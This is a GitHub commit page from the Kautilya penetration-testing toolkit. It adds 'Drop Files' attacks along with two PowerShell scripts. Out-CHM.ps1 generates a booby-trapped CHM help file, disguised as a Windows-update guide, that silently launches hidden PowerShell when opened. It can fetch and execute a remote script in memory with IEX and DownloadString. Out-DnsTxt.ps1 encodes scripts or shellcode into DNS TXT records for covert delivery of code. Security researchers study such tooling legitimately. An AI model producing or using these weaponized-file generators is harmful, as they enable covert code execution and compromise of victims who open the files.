Skip to content

Commit

Permalink
Added dropping weaponized files attacks
Browse files Browse the repository at this point in the history
  • Loading branch information
@samratashok
samratashok committed Jan 26, 2015
1 parent 0946db5 commit 9a0175b
Show file tree
Hide file tree
Showing 21 changed files with 5,197 additions and 492 deletions.
9 changes: 9 additions & 0 deletions CHANGELOG
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,12 @@
0.5.5
- Added new category of attacks "Drop Files"
- Added "Drop a MS Word File" under Drop Files category.
- Added "Drop a MS Excel File" under Drop Files category.
- Added "Drop a CHM (Compiled HTML Help) file" under Drop Files category.
- Added "Drop a Shortcut (.LNK) file" under Drop Files category.
- Added "Drop a JAR file" under Drop Files category.
- Fixed a bug where function call for "Code Execution using DNS TXT queries" had a typo.
- Improvements to "Code Execution using DNS TXT queries", Rogue AP and "DNS TXT Backdoor".
0.5.4
- Fixed hash corruption bug in "Hashdump and Exfiltrate" payload.
- Changes to Compression and Encoding for some payloads.
Expand Down
177 changes: 177 additions & 0 deletions extras/Out-CHM.ps1
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,177 @@

function Out-CHM
{

<#
.SYNOPSIS
Nishang script modified for Kautilya, useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.
.DESCRIPTION
The script generates a CHM file which needs to be sent to a target.
You must have hhc.exe (HTML Help Workshop) on your machine to use this script.
HTML Help Workshop is a free Microsoft Tool and could be downloaded from below link:
http://www.microsoft.com/en-us/download/details.aspx?id=21138
.PARAMETER Payload
Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target.
.PARAMETER Arguments
Arguments to the powershell script to be executed on the target.
.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.
.EXAMPLE
PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Above command would execute Get-Process on the target machine when the CHM file is opened.
.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to generate CHM file which download and execute the given powershell script in memory on target.
.EXAMPLE
PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to generate CHM file which executes the encoded command/script.
Use Invoke-Encode from Nishang to encode the command or script.
.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to pass an argument to the powershell script/module.
.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang
.Notes
Based on the work mentioned in this tweet by @ithurricanept
https://twitter.com/ithurricanept/status/534993743196090368
#>



[CmdletBinding()] Param(

[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload,

[Parameter(Position = 1, Mandatory = $False)]
[String]
$PayloadURL,

[Parameter(Position = 2, Mandatory = $False)]
[String]
$Arguments,

[Parameter(Position = 3, Mandatory = $True)]
[String]
$HHCPath,

[Parameter(Position = 4, Mandatory = $False)]
[String]
$OutputPath="$pwd"
)

#Check if the payload has been provided by the user
if(!$Payload)
{
$Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
}

#Create the table of contents for the CHM
$CHMTableOfContents = @"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="IPv4 Advanced IP Settings Tab">
<param name="Local" value="doc.htm">
</OBJECT>
</UL>
</BODY>
</HTML>
"@

#Create the Project file for the CHM
$CHMProject = @"
[OPTIONS]
Contents file=$OutputPath\doc.hhc
[FILES]
$OutputPath\doc.htm
"@
#Create the HTM files, the first one controls the payload execution.
$CHMHTML1 = @"
<HTML>
<TITLE>Check for Windows updates from Command Line</TITLE>
<HEAD>
</HEAD>
<BODY>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile $Payload">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</BODY>
</HTML>
"@


#Write all files to disk for compilation
Out-File -InputObject $CHMTableOfContents -FilePath "$OutputPath\doc.hhc" -Encoding default
Out-File -InputObject $CHMHTML1 -FilePath "$OutputPath\doc.htm" -Encoding default
Out-File -InputObject $CHMProject -FilePath "$OutputPath\doc.hhp" -Encoding default

#Compile the CHM, only this needs to be sent to a target.
$HHC = "$HHCPath" + "\hhc.exe"
& "$HHC" "$OutputPath\doc.hhp"

#Cleanup
Remove-Item "$OutputPath\doc.hhc"
Remove-Item "$OutputPath\doc.htm"
Remove-Item "$OutputPath\doc.hhp"

#Create a zip archive of the CHM file
$SourceFile = "$OutputPath\doc.chm"
$ZipFile = "$OutputPath\doc.zip"
#http://stackoverflow.com/questions/11021879/creating-a-zipped-compressed-folder-in-windows-using-powershell-or-the-command-l
if(-not (test-path($ZipFile)))
{
Set-Content $ZipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
}

$shellApplication = new-object -com shell.application
$zippackage = $shellApplication.NameSpace($ZipFile)
$zippackage.copyhere($SourceFile)

#Wait till zip archive is written to the disk
Start-Sleep -Seconds 3

#Read the zip archive in bytes and write to a file
#Use this txt file in Kautilya with the Drop CHM file payload.
[byte[]] $FileContent = Get-Content -Encoding Byte $ZipFile
[System.IO.File]::WriteAllLines("$OutputPath\encodedchm.txt", $FileContent)

#Cleanup
Remove-Item $SourceFile
Remove-Item $ZipFile

}
113 changes: 113 additions & 0 deletions extras/Out-DnsTxt.ps1
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,113 @@
function Out-DnsTxt
{
<#
.SYNOPSIS
Script for Nishang to generate DNS TXT records which could be used with other scripts.
.DESCRIPTION
Use this script to generate DNS TXT records to be used with DNS_TXT_Pwnage and Execute-DNSTXT-Code.
The script asks for a path to a plain file or string, compresses and encodes it and writes to a file "encodedtxt.txt" in the current working directory.
Each line in the generated file is a DNS TXT record to be saved in separate subbdomain.
The length of DNS TXT records is assumed to be 255 characters by the script.
.PARAMETER DataToEncode
The path of the file to be decoded. Use with -IsString to enter a string.
.PARAMETER OutputFilePath
The path of the output file. Default is "encodedtxt.txt" in the current working directory.
.PARAMETER $LengthOfTXT
The length of the TXT records. Default is 255.
.PARAMETER IsString
Use this to specify the command to be encoded if you are passing a string in place of a filepath.
.EXAMPLE
PS > OUT-DNSTXT -DataToEncode C:\nishang\Gather\Get-Information.ps1
Use above command to generate encoded DNS TXT records. Each record must be put in a separate subdomain.
.EXAMPLE
PS > OUT-DNSTXT "Get-Service" -IsString
Use above to generate TXT records for a command.
.EXAMPLE
PS > OUT-DNSTXT -DataToEncode C:\shellcode\shellcode.txt
Use above command to generate encoded DNS TXT records for a shellcode. Each record must be put in a separate subdomain.
.LINK
http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$DataToEncode,

[Parameter(Position = 1, Mandatory = $False)]
[String]
$OutputFilePath = "$pwd\encodedtxt.txt",

[Parameter(Mandatory = $False)]
[String]
$LengthOfTXT = 255,

[Switch]
$IsString
)
if($IsString -eq $true)
{

$Enc = $DataToEncode

}
else
{
$Enc = Get-Content $DataToEncode -Encoding Ascii
}

#Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$Enc | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 encode stream
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$index = [math]::floor($Compressed.Length/$LengthOfTXT)
$i = 0
Out-File -InputObject $null -FilePath $OutputFilePath
#Split encoded input in strings of 255 characters if its length is more than 255.
if ($Compressed.Length -gt $LengthOfTXT)
{
while ($i -lt $index )
{
$TXTRecord = $Compressed.Substring($i*$LengthOfTXT,$LengthOfTXT)
$i +=1
Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append
Out-File -InputObject "`n`n`n" -FilePath $OutputFilePath -Append
}
$remainingindex = $Compressed.Length%$LengthOfTXT
if ($remainingindex -ne 0)
{
$TXTRecord = $Compressed.Substring($index*$LengthOfTXT, $remainingindex)
$TotalRecords = $index + 1
}
#Write to file
Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append
Write-Output "You need to create $TotalRecords TXT records."
Write-Output "All TXT Records written to $OutputFilePath"
}
#If the input has small length, it could be used in a single subdomain.
else
{
Write-Output "TXT Record could fit in single subdomain."
Write-Output $Compressed
Out-File -InputObject $Compressed -FilePath $OutputFilePath -Append
Write-Output "TXT Records written to $OutputFilePath"
}


}
Loading

0 comments on commit 9a0175b

Please sign in to comment.